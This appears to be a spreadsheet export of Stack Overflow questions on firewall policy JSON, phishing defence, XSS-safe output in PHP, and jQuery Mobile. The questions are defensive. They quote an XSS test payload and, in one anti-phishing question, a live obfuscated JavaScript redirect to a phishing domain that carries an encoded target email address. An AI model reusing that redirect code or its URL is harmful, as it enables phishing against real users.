  &amp;quot;L-ST-GUEST-Internet1&amp;quot;,
  &amp;quot;L-ST-GUEST-Internet2&amp;quot;
  ]
  }
  },
  &amp;quot;application&amp;quot;:{
  &amp;quot;filter-list&amp;quot;:[
  &amp;quot;Malware_With_High_Risk&amp;quot;
  ]
  }
  },
  &amp;quot;set&amp;quot;:{
  &amp;quot;action&amp;quot;:&amp;quot;deny&amp;quot;,
  &amp;quot;synced-flow&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;tcp-session-keepalive&amp;quot;:&amp;quot;disabled&amp;quot;,
  &amp;quot;lef&amp;quot;:{
  &amp;quot;event&amp;quot;:&amp;quot;never&amp;quot;,
  &amp;quot;options&amp;quot;:{
  &amp;quot;send-pcap-data&amp;quot;:{
  &amp;quot;enable&amp;quot;:false
  }
  }
  }
  }
  },
  {
  &amp;quot;name&amp;quot;:&amp;quot;URL-FILTERING&amp;quot;,
  &amp;quot;match&amp;quot;:{
  &amp;quot;source&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;Intf-GUEST-Zone&amp;quot;
  ]
  },
  &amp;quot;address&amp;quot;:{
  &amp;quot;address-list&amp;quot;:[
  &amp;quot;2-NETS&amp;quot;,
  &amp;quot;1-NETS&amp;quot;
  ],
  &amp;quot;address-group-list&amp;quot;:[
  &amp;quot;1GROUP&amp;quot;,
  &amp;quot;2GROUP&amp;quot;
  ]
  },
  &amp;quot;user&amp;quot;:{
  &amp;quot;local-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;external-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;user-type&amp;quot;:&amp;quot;any&amp;quot;
  }
  },
  &amp;quot;destination&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;L-ST-GUEST-Internet1&amp;quot;,
  &amp;quot;L-ST-GUEST-Internet2&amp;quot;
  ]
  }
  },
  &amp;quot;url-category&amp;quot;:{
  &amp;quot;predefined&amp;quot;:[
  &amp;quot;adult_and_pornography&amp;quot;,
  &amp;quot;confirmed_spam_sources&amp;quot;,
  &amp;quot;dead_sites&amp;quot;,
  &amp;quot;gross&amp;quot;,
  &amp;quot;hacking&amp;quot;,
  &amp;quot;malware_sites&amp;quot;,
  &amp;quot;nudity&amp;quot;,
  &amp;quot;open_http_proxies&amp;quot;,
  &amp;quot;peer_to_peer&amp;quot;,
  &amp;quot;phishing_and_other_frauds&amp;quot;,
  &amp;quot;proxy_avoid_and_anonymizers&amp;quot;,
  &amp;quot;spam_urls&amp;quot;,
  &amp;quot;spyware_and_adware&amp;quot;
  ]
  }
  },
  &amp;quot;set&amp;quot;:{
  &amp;quot;action&amp;quot;:&amp;quot;deny&amp;quot;,
  &amp;quot;synced-flow&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;tcp-session-keepalive&amp;quot;:&amp;quot;disabled&amp;quot;,
  &amp;quot;lef&amp;quot;:{
  &amp;quot;event&amp;quot;:&amp;quot;never&amp;quot;,
  &amp;quot;options&amp;quot;:{
  &amp;quot;send-pcap-data&amp;quot;:{
  &amp;quot;enable&amp;quot;:false
  }
  }
  }
  }
  },
  {
  &amp;quot;name&amp;quot;:&amp;quot;PUBLIC-DNS&amp;quot;,
  &amp;quot;match&amp;quot;:{
  &amp;quot;source&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;Intf-GUEST-Zone&amp;quot;
  ]
  },
  &amp;quot;address&amp;quot;:{
  &amp;quot;address-list&amp;quot;:[
  &amp;quot;1-NETS&amp;quot;,
  &amp;quot;2-NETS&amp;quot;
  ],
  &amp;quot;address-group-list&amp;quot;:[
  &amp;quot;2-GUEST&amp;quot;,
  &amp;quot;3-GROUP&amp;quot;
  ]
  },
  &amp;quot;user&amp;quot;:{
  &amp;quot;local-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;external-database&amp;quot;:{
  &amp;quot;status&amp;quot;:&amp;quot;disabled&amp;quot;
  },
  &amp;quot;user-type&amp;quot;:&amp;quot;any&amp;quot;
  }
  },
  &amp;quot;destination&amp;quot;:{
  &amp;quot;zone&amp;quot;:{
  &amp;quot;zone-list&amp;quot;:[
  &amp;quot;L-ST-GUEST-Internet1&amp;quot;,
  &amp;quot;L-ST-GUEST-Internet2&amp;quot;
  ]
  },
  &amp;quot;address&amp;quot;:{
  &amp;quot;address-list&amp;quot;:[
  &amp;quot;dns-google&amp;quot;,
  &amp;quot;dns-google1&amp;quot;
  ]
  }
  },
  &amp;quot;services&amp;quot;:{
  &amp;quot;services-list&amp;quot;:[
  &amp;quot;dns&amp;quot;
  ]
  }
  },
  &amp;quot;set&amp;quot;:{
  &amp;quot;action&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;synced-flow&amp;quot;:&amp;quot;allow&amp;quot;,
  &amp;quot;tcp-session-keepalive&amp;quot;:&amp;quot;disabled&amp;quot;,
  &amp;quot;lef&amp;quot;:{
  &amp;quot;event&amp;quot;:&amp;quot;never&amp;quot;,
  &amp;quot;options&amp;quot;:{
  &amp;quot;send-pcap-data&amp;quot;:{
  &amp;quot;enable&amp;quot;:false
  }
  }
  }
  }
  }
  ]
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Out of above to fetch the information of the key source and destination I extracted out below key value of key=source.&lt;/p&gt;
 &lt;p&gt;When I am trying to fetch data, for example&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;data_src = {'zone': 
  {'zone-list': ['Intf-GLOBAL-Zone']
  }, 
  'address': 
  {'address-list': ['Netowkr1', 'Netowkr1'], 'address-group-list': ['SOMEDATA']
  }, 
  'user': 
  {'local-database': {'status': 'disabled'}, 
  'external-database': {'status': 'disabled'}, 
  'user-type': 'any'
  }
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;data_src['zone']['zone-list'] --&amp;gt; this gives me list of zone properly&lt;/p&gt;
 &lt;p&gt;data_src['address']['address-list'] this doesn't give me any key value and throws&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;address_list = policy_source['address']['address-list']
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;KeyError: 'address'&lt;/p&gt;
 &lt;p&gt;I am stuck here from almost one day. Can you guide me how I can get this corrected.&lt;/p&gt;
 &lt;p&gt;I have a huge file where I need to extract data of below fields to an excel for each of the line data inside json file.&lt;/p&gt;
 &lt;p&gt;For each iteration of line I need to extract below data&lt;/p&gt;
 &lt;p&gt;Out of source : key&lt;/p&gt;
 &lt;p&gt;'name'
 'description'
 zone-list'
 address:&lt;/p&gt;
 &lt;p&gt;Out of source : key
 'name'
 'description'
 zone-list'
 address&lt;/p&gt;
 &lt;p&gt;Then rest of the data&lt;/p&gt;
 &lt;p&gt;'services'
 'set'
 'action'
 'lef'&lt;/p&gt;
 &lt;p&gt;Let me know if anything else is required.&lt;/p&gt;
 &lt;p&gt;for now before defining a function patter for this one i am trying to read each dictionary to formulate the code&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;import json
 import csv
 with open(&amp;quot;rule.json&amp;quot;) as access_json:
  read_content = json.load(access_json)
  read_index = read_content['access-policy']
  for policy_data in read_index:
  policy_name = policy_data['name']
  policy_elements = policy_data['match']
  policy_source = policy_data['match']['source']
  print(policy_source)
  print(policy_source['zone']['zone-list']) #This works fine
  #below doesnt work as this should be the next key value
  print(policy_source['address']['address-list'])
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;python-3.x&gt;</t>
  </si>
  <si>
    <t>Exchange Rule based on Sender From "Name" instead of address?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm trying to alleviate some phishing attacks that leverage a real From Name, but fake/variable From Address.&lt;/p&gt;
 &lt;p&gt;Essentially, someone will send an e-mail from John Smith, but the address is xnuinds@some-domain.com. I want to issue a rule associated with the name &amp;quot;John Smith&amp;quot; rather than the e-mail address xnuinds@some-domain.com.&lt;/p&gt;
 &lt;p&gt;We're having targeted phishing attacks where folks are creating free e-mail accounts and using legit names that it appears from. So it comes through as &lt;em&gt;John Smith xnuinds@some-domain.com&lt;/em&gt; and essentially looks real unless you look at the underlying e-mail address.&lt;/p&gt;
 &lt;p&gt;The only options in our exchange admin center appears to be associated with e-mail addresses, rather than FROM names.&lt;/p&gt;
 &lt;p&gt;Has anyone tried to build any specific rules based on From Names before, rather than addresses?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/qaMYf.jpg" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/qaMYf.jpg" alt="Exchange Admin Center Rule" /&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;office365&gt;&lt;exchange-server&gt;&lt;email-spam&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>iOS browser throws Phishing warning</t>
  </si>
  <si>
    <t>&lt;p&gt;We have a site, &lt;code&gt;mysite.com&lt;/code&gt;, which links to another site of ours, &lt;code&gt;mydemo.com&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;The link is &lt;code&gt;https://demouser:password@subdomain.mydemo.com&lt;/code&gt;, and in iOS, when users click on the link, because of the username and password. Below is the image :&lt;/p&gt;
 &lt;p&gt;&lt;img src="https://i.imgur.com/0fRFcuv.png" alt="they get a phishing warning"&gt;&lt;/p&gt;
 &lt;p&gt;Is there some possibility to tell the iOS browser that this is not a phishing attempt?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ios&gt;&lt;safari&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Unstyled (no classes applied) Pages jQuery Mobile Simple Navigation</t>
  </si>
  <si>
    <t>&lt;p&gt;I have created a simple two page example, first page has a list view and the second just a &lt;code&gt;&amp;lt;h1&amp;gt;&lt;/code&gt;, however when the second page gets loaded there are now ui styles applied to it automatically? Do I have to call something manually or is there an issue with how I've laid out the navigation? Code below any help much appreciated.&lt;/p&gt;
 &lt;p&gt;index.html&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;!doctype html&amp;gt;
 &amp;lt;html lang="en" class="no-js"&amp;gt;
 &amp;lt;head&amp;gt;
  &amp;lt;meta charset="utf-8"&amp;gt;
  &amp;lt;title&amp;gt;Page One&amp;lt;/title&amp;gt;
  &amp;lt;link rel="stylesheet" href="http://code.jquery.com/mobile/1.0a2/jquery.mobile-1.0a2.min.css"&amp;gt;
  &amp;lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script src="http://code.jquery.com/mobile/1.0a2/jquery.mobile-1.0a2.min.js"&amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
  &amp;lt;div data-role="page" data-theme="a" id="second"&amp;gt;
  &amp;lt;div data-role="header"&amp;gt;
  &amp;lt;h1 id="logo" class="ui-title"&amp;gt;Header&amp;lt;/h1&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div data-role="content"&amp;gt;
  &amp;lt;ul data-role="listview" data-inset="true" data-theme="c" data-split-theme="d"&amp;gt;
  &amp;lt;li class="ui-li-has-thumb"&amp;gt;
  &amp;lt;img class="ui-li-thumb" src="http://jquerymobile.com/demos/1.0a2/docs/lists/images/album-bb.jpg" /&amp;gt;
  &amp;lt;h3 class="ui-li-heading"&amp;gt;FooBar&amp;lt;/h3&amp;gt;
  &amp;lt;p class="ui-li-desc"&amp;gt;Progress&amp;lt;/p&amp;gt;
  &amp;lt;a href="second.html"&amp;gt;&amp;lt;/a&amp;gt;
  &amp;lt;/li&amp;gt;
  &amp;lt;li class="ui-li-has-thumb"&amp;gt;
  &amp;lt;img class="ui-li-thumb" src="http://jquerymobile.com/demos/1.0a2/docs/lists/images/album-bb.jpg" /&amp;gt;
  &amp;lt;h3 class="ui-li-heading"&amp;gt;FooBar&amp;lt;/h3&amp;gt;
  &amp;lt;p class="ui-li-desc"&amp;gt;Progress&amp;lt;/p&amp;gt;
  &amp;lt;a href="second.html"&amp;gt;&amp;lt;/a&amp;gt;
  &amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div data-role="footer" data-position="fixed"&amp;gt;
  &amp;lt;div data-role="navbar" class="ui-glyphish"&amp;gt;
  &amp;lt;ul&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a class="ui-btn-active" id="quickfind" href="index.html" data-icon="custom"&amp;gt;QuickFind&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a id="lessons" href="lessons.html&amp;amp;ui-page=listview-1" data-icon="custom" data-theme="a"&amp;gt;Lessons&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a id="progress" href="#" data-icon="custom" data-theme="a"&amp;gt;Progress&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a id="favs" href="#" data-icon="custom" data-theme="a"&amp;gt;Favs&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;second.html&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;!doctype html&amp;gt;
 &amp;lt;html lang="en" class="no-js"&amp;gt;
 &amp;lt;head&amp;gt;
  &amp;lt;meta charset="utf-8"&amp;gt;
  &amp;lt;title&amp;gt;Page Two&amp;lt;/title&amp;gt;
  &amp;lt;link rel="stylesheet" href="http://code.jquery.com/mobile/1.0a2/jquery.mobile-1.0a2.min.css"&amp;gt;
  &amp;lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"&amp;gt;&amp;lt;/script&amp;gt;
  &amp;lt;script src="http://code.jquery.com/mobile/1.0a2/jquery.mobile-1.0a2.min.js"&amp;gt;&amp;lt;/script&amp;gt;
 &amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
  &amp;lt;div data-role="page"&amp;gt;
  &amp;lt;div data-role="header"&amp;gt;
  &amp;lt;h1 id="logo" class="ui-title"&amp;gt;Second&amp;lt;/h1&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div data-role="content"&amp;gt;
  &amp;lt;h1&amp;gt;Hello Page Two&amp;lt;/h1&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div data-role="footer" data-position="fixed"&amp;gt;
  &amp;lt;div data-role="navbar" class="ui-glyphish"&amp;gt;
  &amp;lt;ul&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a class="ui-btn-active" id="quickfind" href="index.html" data-icon="custom"&amp;gt;QuickFind&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a id="lessons" href="lessons.html&amp;amp;ui-page=listview-1" data-icon="custom" data-theme="a"&amp;gt;Lessons&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a id="progress" href="#" data-icon="custom" data-theme="a"&amp;gt;Progress&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a id="favs" href="#" data-icon="custom" data-theme="a"&amp;gt;Favs&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
 &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;jquery&gt;&lt;jquery-mobile&gt;</t>
  </si>
  <si>
    <t>Chrome extension content script for extracting URL features</t>
  </si>
  <si>
    <t>&lt;p&gt;This is only a snippet of code for building Chrome extension to detect phishing URL. The code below is to extract the URL features. What I do not understand is the purpose of &lt;code&gt;function predict(data,weight)&lt;/code&gt;. What are the numbers in weight for ? Eg: &lt;code&gt;weight = [3.33346292e-01, ...]&lt;/code&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;var testdata;
 var prediction;
 function predict(data,weight){
  var f = 0;
  weight = [3.33346292e-01,-1.11200396e-01,-7.77821806e-01,1.11058590e-01,3.89430647e-01,1.99992062e+00,4.44366975e-01,-2.77951957e-01,-6.00531647e-05,3.33200243e-01,2.66644002e+00,6.66735991e-01,5.55496098e-01,5.57022408e-02,2.22225591e-01,-1.66678858e-01];
  for(var j=0;j&amp;lt;data.length;j++) {
  f += data[j] * weight[j];
  }
  return f &amp;gt; 0 ? 1 : -1;
 }
 function isLongURL(){
  var url = window.location.href; 
  if(url.length&amp;lt;54){
  console.log(&amp;quot;NP&amp;quot;);
  return -1;
  } 
  else if(url.length&amp;gt;=54 &amp;amp;&amp;amp; url.length&amp;lt;=75){
  console.log(&amp;quot;Maybe&amp;quot;);
  return 0;
  }
  else{
  console.log(&amp;quot;P&amp;quot;);
  return 1;
  }
 }
 testdata = [isLongURL(),isTinyURL(),isAlphaNumericURL(),isRedirectingURL(),isHypenURL()];
 prediction = predict(testdata);
 chrome.extension.sendRequest(prediction);
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;There are many other URL features function code but here I only included one example which is the checking for Long URL.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;google-chrome-extension&gt;&lt;feature-extraction&gt;&lt;content-script&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>force Apache2 to respond only on 1 specific URL and not any other</t>
  </si>
  <si>
    <t>&lt;p&gt;I have multiple A record for the same server IP address, I mean:&lt;/p&gt;
 &lt;pre&gt;
 URL DNS res.
 goodurl.com 10.0.0.1 
 badurl1.com 10.0.0.1 
 badurl2.com 10.0.0.1
 &lt;/pre&gt;
 &lt;p&gt;I would like to configure Apache2 so that it works only with URL goodurl.com and not with any other.&lt;/p&gt;
 &lt;p&gt;I've found the way to give "access denied" on specific URL "badurl1.com" like this :&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;VirtualHost *:80&amp;gt;
  ServerName badurl1.com
  DocumentRoot /var/www
  &amp;lt;Directory /var/www/&amp;gt;
  AllowOverride None
  Order deny,allow
  deny from all
  &amp;lt;/Directory&amp;gt;
 &amp;lt;/VirtualHost&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;Is there a more elegant and efficent way to do the same?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Is there a way to configure Apache to be sure that any other future and undesired new A record, will be rejected by default?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;thanks in advance for your help&lt;/p&gt;
 &lt;pre&gt;
 system SO: Linux 2.6.32-5-amd64 x86_64 GNU/Linux
 Server version: Apache/2.2.16 (Debian)
 &lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;apache&gt;&lt;virtualhost&gt;&lt;restrict&gt;&lt;phishing&gt;&lt;a-records&gt;</t>
  </si>
  <si>
    <t>Should I echo User Submitted Links Here With strip_tags() or htmlspecialchars()?</t>
  </si>
  <si>
    <t>&lt;p&gt;Got to securely echo User submitted link on my page so that echoing the user's submitted url does not contain html or javascript that break-up the html of my page.
 By html breakup, I mean a malicious user adds html tags on the url submission input field (on my link submission webform) and his html input messes with the html on my page during outputting his url as a link on my page. Or user ads Javascipt that gives alert or redirects other visitors to phishing sites from my page. Got to prevent malicious users submitting urls that have parts like:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;?search=&amp;lt;script&amp;gt;alert('hacked')&amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Really got to prevent users doing things like these. Prevent them adding codes where when when my other visitors load my page or click the malicious user's submitted link, then they fail to trigger the malicious codes or fail to get redirected to malicious sites.
 I got two choices. Not sure which one is valid ...
 Which is the valid echo out of these two and which one should I stick to:&lt;/p&gt;
 &lt;p&gt;A.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;//WHICH OF THE FOLLOWING TWO ECHOES IS BEST ?
 //OPTION 1
 echo 'Link: &amp;lt;a href=' .'&amp;quot;' .strip_tags($url) .'&amp;quot;' .'&amp;gt;' .'&amp;lt;b&amp;gt;' .strip_tags($url) .'&amp;lt;/b&amp;gt;' .'&amp;lt;/a&amp;gt;'; echo '&amp;lt;br&amp;gt;';
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;B.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;//OPTION 2
 echo 'Link: &amp;lt;a href=' .'&amp;quot;' .htmlspecialchars($url) .'&amp;quot;' .'&amp;gt;' .'&amp;lt;b&amp;gt;' .htmlspecialchars($url) .'&amp;lt;/b&amp;gt;' .'&amp;lt;/a&amp;gt;'; echo '&amp;lt;br&amp;gt;'; 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;CONTEXT&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$query = &amp;quot;SELECT id,date_and_time,domain,domain_email,ip,url,anchor,description,keyword From $table WHERE $column = ? LIMIT $offset,$max&amp;quot;;
 $stmt = mysqli_stmt_init($conn);
 if(mysqli_stmt_prepare($stmt,$query))
 {
  mysqli_stmt_bind_param($stmt,'s',$find);
  mysqli_stmt_execute($stmt);
  if($result = mysqli_stmt_get_result($stmt))
  {
  $columns = mysqli_fetch_array($result);
  $submission_id = $columns['id'];
  $submission_date_and_time = $columns['date_and_time'];
  $domain = $columns['domain'];
  $domain_email = $columns['email'];
  $ip = $columns['ip'];
  $url = $columns['url'];
  $anchor = $columns['anchor'];
  $description = $columns['description'];
  $keyword = $columns['keyword'];
  $keyphrase = $columns['keyphrase'];
  echo 'Submission Id: ' .$submission_id; echo '&amp;lt;br&amp;gt;';
  echo 'Submission Date And Time: ' .$submission_date_and_time; echo '&amp;lt;br&amp;gt;';
  echo 'Email: ' .$domain_email; echo '&amp;lt;br&amp;gt;';
  echo 'Domain: ' .$domain; echo '&amp;lt;br&amp;gt;';
  echo 'Url: ' .$url; echo '&amp;lt;br&amp;gt;';
  echo 'Anchor: ' .$anchor; echo '&amp;lt;br&amp;gt;';
  echo 'Description: ' .$description; echo '&amp;lt;br&amp;gt;';
  echo 'Keyword: ' .$keyword; echo '&amp;lt;br&amp;gt;';
  echo 'Keyphrase: ' .$keyword; echo '&amp;lt;br&amp;gt;';
  //WHICH OF THE FOLLOWING TWO ECHOES IS BEST ?
  //OPTION 1
  echo 'Link: &amp;lt;a href=' .'&amp;quot;' .strip_tags($url) .'&amp;quot;' .'&amp;gt;' .'&amp;lt;b&amp;gt;' .strip_tags($url) .'&amp;lt;/b&amp;gt;' .'&amp;lt;/a&amp;gt;'; echo '&amp;lt;br&amp;gt;';
  //OPTION 2
  echo 'Link: &amp;lt;a href=' .'&amp;quot;' .htmlspecialchars($url) .'&amp;quot;' .'&amp;gt;' .'&amp;lt;b&amp;gt;' .htmlspecialchars($url) .'&amp;lt;/b&amp;gt;' .'&amp;lt;/a&amp;gt;'; echo '&amp;lt;br&amp;gt;'; 
  }
  else
  {
  //Error Messages for Production Mode only.
  echo 'Record fetching failed!';
  echo 'Error: ' .mysqli_stmt_error($stmt);
  echo 'Error: ' .mysqli_stmt_errno($stmt);
  }
 mysqli_stmt_close($stmt);
 }
 mysqli_close($conn);
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Or, if you have better way of coding to securely output user submitted links then I'd like to see how you do it.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;htmlspecialchars&gt;&lt;strip-tags&gt;</t>
  </si>
  <si>
    <t>set gradient colour (color) for uibutton background image iphone sdk</t>
  </si>
  <si>
    <t>&lt;p&gt;I have purchased the Glyphish set of icons.. but they are all dark. I was wondering if there's a way to set the PNG gradient colour when I set the image as the background of a UIButton? &lt;/p&gt;
 &lt;p&gt;I was thinking of something like when the button is disabled, it changes colour. Is there any way to replicate this functionality??&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;iphone&gt;&lt;iphone-sdk-3.0&gt;&lt;uibutton&gt;</t>
  </si>
  <si>
    <t>Figuring Phishing redirection hidden in web source code</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm working at an anti Phishing company and I've stumbled a case which managed to evade our JCrawler, I tried to understand the code and what the attacker did here to stay undetectable and couldn't figure it out got really confused.&lt;/p&gt;
 &lt;p&gt;How can I avoid missing detection for sites such as this:&lt;/p&gt;
 &lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false"&gt;
 &lt;div class="snippet-code"&gt;
 &lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
 &amp;lt;html&amp;gt;
 &amp;lt;title&amp;gt;Loading...&amp;lt;/title&amp;gt;
 &amp;lt;link rel="shortcut icon" href="favicon_a_eupayfgghqiai7k9sol6lg2.ico" /&amp;gt;
  &amp;lt;body&amp;gt;
  &amp;lt;script&amp;gt;
  var _0x117d=['4gSLXgI','2815VEHvFQ','14927VMrRFI','180751tIiKtp','11OWCNOZ','264810PhaCGI','49788ekTpju','https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQseoEAXkZbuLZbhvqckbUQIUGexERLdh7SGIiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=','53294CAvUWH','289945bcwcUH','68GhmPuA','replace','15KaunFV'];
  var _0x3d5f=function(_0x1853ca,_0x41286d){_0x1853ca=_0x1853ca-0x108;
  var _0x117ddf=_0x117d[_0x1853ca];
  return _0x117ddf;};
  var _0x37e4a6=_0x3d5f;
  (function(_0x5bb9bd,_0x286286){var _0xe278b9=_0x3d5f;
  while(!![])
  {try{var _0x2d8884=parseInt(_0xe278b9(0x10c))*-parseInt(_0xe278b9(0x111))+parseInt(_0xe278b9(0x10d))+-parseInt(_0xe278b9(0x112))*parseInt(_0xe278b9(0x10e))+-parseInt(_0xe278b9(0x109))+parseInt(_0xe278b9(0x113))*parseInt(_0xe278b9(0x110))+-parseInt(_0xe278b9(0x114))+parseInt(_0xe278b9(0x108))*parseInt(_0xe278b9(0x10a));
  if(_0x2d8884===_0x286286)
  break;
  else _0x5bb9bd['push'](_0x5bb9bd['shift']());}
  catch(_0x54c267){_0x5bb9bd['push'](_0x5bb9bd['shift']());}}}(_0x117d,0x339a1),location[_0x37e4a6(0x10f)](_0x37e4a6(0x10b))); 
 &amp;lt;/script&amp;gt;
  &amp;lt;/body&amp;gt;
 &amp;lt;/html&amp;gt; &lt;/code&gt;&lt;/pre&gt;
 &lt;/div&gt;
 &lt;/div&gt;
 &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;html&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Why does Google Safe Browsing remove its URL? then some of them gets re-added but why?</t>
  </si>
  <si>
    <t>&lt;p&gt;Why does Google Safe Browsing remove its URL? then some of them gets re-added but why?
 I know there will be some false positives collected in the first place, but if I use the python library (&lt;a href="https://stackoverflow.com"&gt;https://github.com/afilipovich/gglsbl&lt;/a&gt;) to sync local database of safe browsing, I see that a lot of URLs are being removed daily.
 Is it possible that it is just removing in local database so that safe browsing keeps local database size small?
 Or is it really that large number of URLs get removed from the list daily? then why? can I say those are all false positives? then why do some of them reappear later on?&lt;/p&gt;
 &lt;p&gt;I downloaded local database of safe browsing to see added and removed URls.
 I checked removed URLs with VirusTotal to see if there is any changes in scanned result.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;url&gt;&lt;phishing&gt;&lt;safe-browsing&gt;&lt;safe-browsing-api&gt;</t>
  </si>
  <si>
    <t>What does this suspicious phishing code do?</t>
  </si>
  <si>
    <t>&lt;p&gt;A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run. &lt;/p&gt;
